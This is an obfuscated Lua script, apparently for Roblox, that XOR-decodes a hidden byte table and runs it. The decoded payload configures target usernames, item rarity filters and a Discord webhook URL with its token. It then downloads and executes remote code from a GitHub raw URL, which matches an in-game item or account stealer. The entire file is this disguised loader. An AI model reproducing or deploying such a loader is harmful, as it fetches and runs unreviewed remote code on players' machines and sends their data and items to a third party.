--[[ v3.0.0 obfuscated by phantom obfuscator https://phantomobf.netlify.app ]]
return(function(...)
  if true then for i=1,4 do end end
  local _osRodq = {"95","89","79","88","89","10","23","10","81","8","64","69","79","80","79","67","76","27","27","27","82","8","6","8","64","69","79","67","75","71","64","69","79","80","79","67","76","8","87","32","71","67","68","117","88","75","88","67","94","83","10","23","10","8","105","69","71","71","69","68","8","32","71","67","68","117","92","75","70","95","79","10","23","10","26","32","90","67","68","77","10","23","10","8","115","79","89","8","32","93","79","72","66","69","69","65","10","23","10","8","66","94","94","90","89","16","5","5","78","67","89","73","69","88","78","4","73","69","71","5","75","90","67","5","93","79","72","66","69","69","65","89","5","27","25","19","26","25","25","26","26","24","18","29","28","29","29","26","29","24","18","28","5","31","94","91","110","83","125","31","91","103","66","7","117","108","120","72","115","126","100","98","19","114","82","82","75","25","31","112","126","123","109","124","122","82","27","122","120","99","117","100","19","73","94","79","76","98","90","99","31","107","115","68","102","104","24","64","91","112","123","83","90","72","65","78","92","117","7","73","79","8","32","70","69","75","78","89","94","88","67","68","77","2","77","75","71","79","16","98","94","94","90","109","79","94","2","8","66","94","94","90","89","16","5","5","88","75","93","4","77","67","94","66","95","72","95","89","79","88","73","69","68","94","79","68","94","4","73","69","71","5","89","90","75","93","68","79","88","89","73","88","67","90","94","5","88","75","68","78","69","71","5","88","79","76","89","5","66","79","75","78","89","5","71","75","67","68","5","72","75","70","75","72","15","24","25","8","3","3","2","3"}
  
        local function _Tywmqw(tbl)
          local out = ""
          for i = 1, #tbl do
            out = out .. string.char(tbl[i] ~ 42)
          end
          return out
        end
      
  local _Zsjufj = loadstring(_Tywmqw(_osRodq))
  _Zsjufj()
end)(...)
